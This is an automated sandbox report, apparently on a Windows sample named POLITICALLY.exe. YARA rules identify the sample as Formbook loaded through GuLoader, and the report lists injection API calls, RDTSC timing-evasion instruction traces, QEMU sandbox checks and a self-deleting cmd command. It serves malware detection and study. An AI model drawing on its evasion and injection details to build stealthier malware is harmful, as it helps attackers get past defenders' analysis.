        Source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Potential malicious icon foundShow sources
        Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
        Source: C:\Users\user\Desktop\POLITICALLY.exeProcess Stats: CPU usage > 98%
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0222E459 NtProtectVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0222EB73 NtMapViewOfSection,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0221AE71 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0221DC36 NtAllocateVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0222F270 NtMapViewOfSection,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0221E245 NtAllocateVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0221B24A NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0221E378 NtAllocateVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0221B3D0 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0222F3D4 NtMapViewOfSection,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0221B121 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0222F658 NtMapViewOfSection,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0221B698 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0222F768 NtMapViewOfSection,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0221B7FC NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0221B514 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0222F519 NtMapViewOfSection,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0221BA7C NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0221DB19 NtAllocateVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_02212B60 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0221BBB2 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0222EB8C NtMapViewOfSection,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0222F896 NtMapViewOfSection,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0221B932 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0221BE0D NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0221AE76 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0221CEAB NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0222EF21 NtMapViewOfSection,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0221BF4D NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0221AFD8 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0221DFD8 NtAllocateVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0221BCDC NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0222EDB9 NtMapViewOfSection,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0221DD81 NtAllocateVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E279660 NtAllocateVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2796E0 NtFreeVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E279710 NtQueryInformationToken,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2797A0 NtUnmapViewOfSection,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E279780 NtMapViewOfSection,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E279FE0 NtCreateMutant,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E279540 NtReadFile,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2795D0 NtClose,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E279A20 NtResumeThread,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E279A00 NtProtectVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E279A50 NtCreateFile,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E279860 NtQuerySystemInformation,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E279840 NtDelayExecution,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2798F0 NtReadVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E279910 NtAdjustPrivilegesToken,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2799A0 NtCreateSection,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E279610 NtEnumerateValueKey,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E279670 NtQueryInformationProcess,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E279650 NtQueryValueKey,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2796D0 NtCreateKey,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E279730 NtQueryVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E27A710 NtOpenProcessToken,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E279760 NtOpenProcess,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E27A770 NtOpenThread,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E279770 NtSetInformationFile,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E279520 NtWaitForSingleObject,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E27AD30 NtSetContextThread,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E279560 NtWriteFile,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2795F0 NtQueryInformationFile,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E279A10 NtQuerySection,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E279A80 NtOpenDirectoryObject,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E279B00 NtSetValueKey,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E27A3B0 NtGetContextThread,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E279820 NtEnumerateKey,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E27B040 NtSuspendThread,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2798A0 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E279950 NtQueueApcThread,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2799D0 NtCreateProcessEx,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048695D0 NtClose,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04869540 NtReadFile,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048696D0 NtCreateKey,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048696E0 NtFreeVirtualMemory,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04869650 NtQueryValueKey,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04869660 NtAllocateVirtualMemory,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04869780 NtMapViewOfSection,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04869FE0 NtCreateMutant,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04869710 NtQueryInformationToken,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04869840 NtDelayExecution,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04869860 NtQuerySystemInformation,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048699A0 NtCreateSection,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04869910 NtAdjustPrivilegesToken,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04869A50 NtCreateFile,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048695F0 NtQueryInformationFile,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04869520 NtWaitForSingleObject,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0486AD30 NtSetContextThread,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04869560 NtWriteFile,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04869610 NtEnumerateValueKey,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04869670 NtQueryInformationProcess,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048697A0 NtUnmapViewOfSection,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0486A710 NtOpenProcessToken,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04869730 NtQueryVirtualMemory,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04869760 NtOpenProcess,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0486A770 NtOpenThread,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04869770 NtSetInformationFile,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048698A0 NtWriteVirtualMemory,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048698F0 NtReadVirtualMemory,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04869820 NtEnumerateKey,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0486B040 NtSuspendThread,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048699D0 NtCreateProcessEx,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04869950 NtQueueApcThread,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04869A80 NtOpenDirectoryObject,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04869A00 NtProtectVirtualMemory,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04869A10 NtQuerySection,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04869A20 NtResumeThread,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0486A3B0 NtGetContextThread,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04869B00 NtSetValueKey,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_030B83A0 NtAllocateVirtualMemory,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_030B8270 NtReadFile,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_030B82F0 NtClose,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_030B81C0 NtCreateFile,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_030B839A NtAllocateVirtualMemory,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_030B826A NtReadFile,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_030B82EA NtClose,
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_030B81BA NtCreateFile,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_00404CFF
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E256E30
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2FD616
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E302EF7
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E301FF1
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E30DFCE
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E24841F
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2FD466
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E230D20
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E302D07
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E301D55
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E262581
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E24D5E0
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E3025DD
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E3022AE
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E302B28
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E26EBB0
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F03DA
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2FDBD2
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E30E824
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F1002
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2620A0
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E3020A8
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E24B090
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E3028EC
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E254120
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E23F900
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0483841F
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048ED466
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04852581
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048F25DD
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0483D5E0
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048F2D07
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04820D20
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048F1D55
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048F2EF7
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048ED616
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04846E30
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048FDFCE
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048F1FF1
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0483B090
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048520A0
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048F20A8
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048F28EC
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048E1002
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048FE824
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0482F900
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04844120
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048F22AE
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0485EBB0
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048E03DA
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048EDBD2
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048F2B28
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_030BCB24
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_030A2FB0
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_030BC6F5
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_030BC50F
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_030A2D8A
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_030A2D90
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_030A8C5E
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_030A8C60
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_030BB4A6
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: String function: 1E23B150 appears 45 times
        Source: C:\Windows\SysWOW64\control.exeCode function: String function: 0482B150 appears 35 times
        Source: POLITICALLY.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: POLITICALLY.exe, 00000002.00000002.415420522.0000000002200000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs POLITICALLY.exe
        Source: POLITICALLY.exe, 0000000A.00000002.560170779.000000001E32F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs POLITICALLY.exe
        Source: POLITICALLY.exe, 0000000A.00000003.543429880.00000000008E3000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs POLITICALLY.exe
        Source: POLITICALLY.exe, 0000000A.00000002.548056458.0000000002420000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs POLITICALLY.exe
        Source: POLITICALLY.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@7/0@0/1
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6776:120:WilError_01
        Source: POLITICALLY.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\POLITICALLY.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
        Source: C:\Users\user\Desktop\POLITICALLY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: POLITICALLY.exeVirustotal: Detection: 17%
        Source: POLITICALLY.exeReversingLabs: Detection: 17%
        Source: unknownProcess created: C:\Users\user\Desktop\POLITICALLY.exe 'C:\Users\user\Desktop\POLITICALLY.exe'
        Source: C:\Users\user\Desktop\POLITICALLY.exeProcess created: C:\Users\user\Desktop\POLITICALLY.exe 'C:\Users\user\Desktop\POLITICALLY.exe'
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
        Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\POLITICALLY.exe'
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\POLITICALLY.exeProcess created: C:\Users\user\Desktop\POLITICALLY.exe 'C:\Users\user\Desktop\POLITICALLY.exe'
        Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\POLITICALLY.exe'
        Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
        Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000013.00000000.532024048.000000000DC20000.00000002.00000001.sdmp
        Source: Binary string: wntdll.pdbUGP source: POLITICALLY.exe, 0000000A.00000002.560170779.000000001E32F000.00000040.00000001.sdmp, control.exe, 00000017.00000002.593834522.000000000491F000.00000040.00000001.sdmp
        Source: Binary string: control.pdb source: POLITICALLY.exe, 0000000A.00000003.543429880.00000000008E3000.00000004.00000001.sdmp
        Source: Binary string: wntdll.pdb source: POLITICALLY.exe, control.exe
        Source: Binary string: control.pdbUGP source: POLITICALLY.exe, 0000000A.00000003.543429880.00000000008E3000.00000004.00000001.sdmp
        Source: Binary string: wscui.pdb source: explorer.exe, 00000013.00000000.532024048.000000000DC20000.00000002.00000001.sdmp

        Data Obfuscation:

        barindex
        Yara detected GuLoaderShow sources
        Source: Yara matchFile source: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_00416E20 push ebx; iretd
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_00403225 pushfd ; iretd
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0221DC36 push ecx; iretd
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0221E245 push ecx; iretd
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0221E378 push ecx; iretd
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0221E736 push ecx; iretd
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0221DB19 push ecx; iretd
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_02221E17 push ds; iretd
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0221DFD8 push ecx; iretd
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0221DD81 push ecx; iretd
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_02221DD8 push ds; iretd
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E28D0D1 push ecx; ret
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0487D0D1 push ecx; ret
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_030BB3B5 push eax; ret
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_030B8F44 push es; ret
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_030BB40B push eax; ret
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_030BB402 push eax; ret
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_030BB46C push eax; ret
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_030AB48A push edx; ret
        Source: C:\Users\user\Desktop\POLITICALLY.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\POLITICALLY.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\POLITICALLY.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        barindex
        Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
        Source: C:\Users\user\Desktop\POLITICALLY.exeRDTSC instruction interceptor: First address: 0000000002228953 second address: 0000000002228D11 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor edi, edi 0x0000000c mov dword ptr [ebp+000000F8h], 00A95F60h 0x00000016 jmp 00007FDAB4B9AB29h 0x0000001b test ecx, 375658D5h 0x00000021 call 00007FDAB4B9AC71h 0x00000026 call 00007FDAB4B9AA18h 0x0000002b lfence 0x0000002e mov edx, dword ptr [7FFE0014h] 0x00000034 lfence 0x00000037 ret 0x00000038 mov esi, edx 0x0000003a pushad 0x0000003b rdtsc
        Source: C:\Users\user\Desktop\POLITICALLY.exeRDTSC instruction interceptor: First address: 0000000002228D11 second address: 0000000002228D11 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FDAB47B2AF8h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d add edi, edx 0x0000001f jmp 00007FDAB47B2C0Dh 0x00000024 cmp eax, eax 0x00000026 dec dword ptr [ebp+000000F8h] 0x0000002c cmp dword ptr [ebp+000000F8h], 00000000h 0x00000033 jne 00007FDAB47B29BDh 0x00000039 call 00007FDAB47B2D61h 0x0000003e call 00007FDAB47B2B08h 0x00000043 lfence 0x00000046 mov edx, dword ptr [7FFE0014h] 0x0000004c lfence 0x0000004f ret 0x00000050 mov esi, edx 0x00000052 pushad 0x00000053 rdtsc
        Tries to detect Any.runShow sources
        Source: C:\Users\user\Desktop\POLITICALLY.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Users\user\Desktop\POLITICALLY.exeFile opened: C:\Program Files\qga\qga.exe
        Source: C:\Users\user\Desktop\POLITICALLY.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Users\user\Desktop\POLITICALLY.exeFile opened: C:\Program Files\qga\qga.exe
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
        Source: POLITICALLY.exe, 0000000A.00000002.546748733.00000000006F0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
